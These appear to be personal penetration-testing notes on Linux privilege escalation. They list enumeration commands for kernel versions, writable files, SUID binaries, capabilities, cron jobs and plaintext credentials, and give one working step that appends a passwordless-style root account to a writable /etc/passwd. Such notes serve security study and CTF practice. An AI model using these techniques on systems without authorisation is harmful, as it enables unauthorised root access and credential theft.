Linux Privesc Notes
Quick rundown on some easy wins for Linux privesc. Use LinPEAS in tandem to maximize potential for finding interesting things.
Are components exploitable?
Basic idea here is to check for whether there's any application or kernel exploits you can take advantage of.
- What is system version? Are there kernel exploits?
uname -a
cat /etc/issue
- What's installed?
dpkg --list
- note that this is every package and could take a while to go through...
Are permissions misconfigured?
Here the idea is to see if there's something you can write to that's run from an elevated context, like a cronjob, dependency, or to find an exploitable file permission via GTFOBins etc. In either case, you can often drop in a shell and get a win.
- writable files or directories?
find / -writable -type d 2>/dev/nul
find / -writable -type f 2>/dev/nulll
- if
/etc/passwd
is writable, do this locally on the victim machine:└─$ openssl passwd w00t
└─$ echo "root2:h842dpEP28MMA:0:0:root:/root:/bin/bash" >> /etc/passwd
- Check for
sudo -l
- Can do GTFObins?
- Need user password for this.
- Check for SUID
find / -perm -u=s -type f 2>/dev/null
- Is gtfobin'able?
- Check for capabilities:
/usr/sbin/getcap -r / 2>/dev/null
- Can do GTFObins?
- Check cronjobs
ls -lah /etc/cron*
- in CTFs and suchlike, something nonstandard in hourly is probably a good indicator that this is the way up.
- running crons:
cat /var/log/cron.log
- Writable cron binaries/scripts?
- Check PATH
echo $PATH
- writable path? Think of it sorta like unquoted service path.
Is critical information exposed?
More or less, can you find creds stored in plaintext?
- Is there interesting information in files?
find / -name *.kdbx -type f 2>/dev/null
- replace
*.kdbx
with other filetypes that might be interesting. Think about db configs, gits, any source code/scripts that may authenticate to something, etc.
- replace
- running processes?
ps aux
top -n 1
- Any creds in command lines? e.g. like a
mysql -u root -p QwE123rfww -h 192.168.13.14
sort of situation.
- Listening network connections?
netstat -tunlp
- Check
history
; probably nothing, but do it anyway.